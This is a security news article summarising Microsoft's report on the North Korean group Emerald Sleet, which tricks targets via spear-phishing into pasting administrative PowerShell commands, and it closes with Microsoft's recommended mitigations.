Microsoft Threat Intelligence has uncovered a novel cyberattack strategy employed by the North Korean state-sponsored hacking group Emerald Sleet, also known as Kimsuky or VELVET CHOLLIMA.
The group is leveraging social engineering techniques to deceive users into executing malicious PowerShell commands with administrative privileges, enabling unauthorized access to their systems.
Emerald Sleet’s approach involves impersonating South Korean government officials to establish trust with their targets.
Once rapport is built, the attackers launch spear-phishing campaigns containing PDF attachments. These attachments direct victims to click on a URL purportedly for “device registration.”
The link provides detailed instructions, urging users to open PowerShell as administrators, paste a provided code snippet, and execute it.
The Attack Chain
When the malicious PowerShell code is executed, it downloads additional tools from a remote server.
These include a browser-based remote desktop application and a certificate file embedded with a hardcoded PIN.
The code then registers the victim’s device with the attackers’ server using the downloaded certificate and PIN.
This registration grants Emerald Sleet remote access to the compromised system, allowing them to exfiltrate sensitive data and conduct espionage activities.
This tactic marks a departure from Emerald Sleet’s traditional methods, which often relied on backdoors and malware such as PebbleDash or RDP Wrapper.
Instead of automated payload delivery mechanisms, this new approach exploits human error by manipulating victims into infecting their own systems.
By requiring user interaction, the attackers bypass conventional security measures that monitor automated processes.
Broader Context
The use of PowerShell in this attack highlights its dual nature as both a legitimate administrative tool and a vehicle for malicious activity.
PowerShell’s deep integration with Windows makes it an attractive target for attackers seeking stealthy execution of commands directly in memory, thereby evading detection by antivirus solutions.
Emerald Sleet’s campaign is part of a broader trend among threat actors adopting similar tactics.
For instance, other North Korean groups have used comparable methods involving macOS Terminal commands or fake CAPTCHA challenges to trick users into executing malicious scripts.
To mitigate such threats, Microsoft recommends organizations:
- Deploy advanced anti-phishing solutions to block malicious emails.
- Educate employees on identifying phishing attempts and avoiding suspicious links.
- Restrict administrative access to PowerShell and implement attack surface reduction rules to block malicious scripts.
This evolving tactic underscores the importance of vigilance against socially engineered attacks that exploit both technical vulnerabilities and human psychology.
Organizations involved in sensitive sectors such as international affairs, media, NGOs, and government agencies must prioritize robust cybersecurity measures to defend against these sophisticated campaigns.
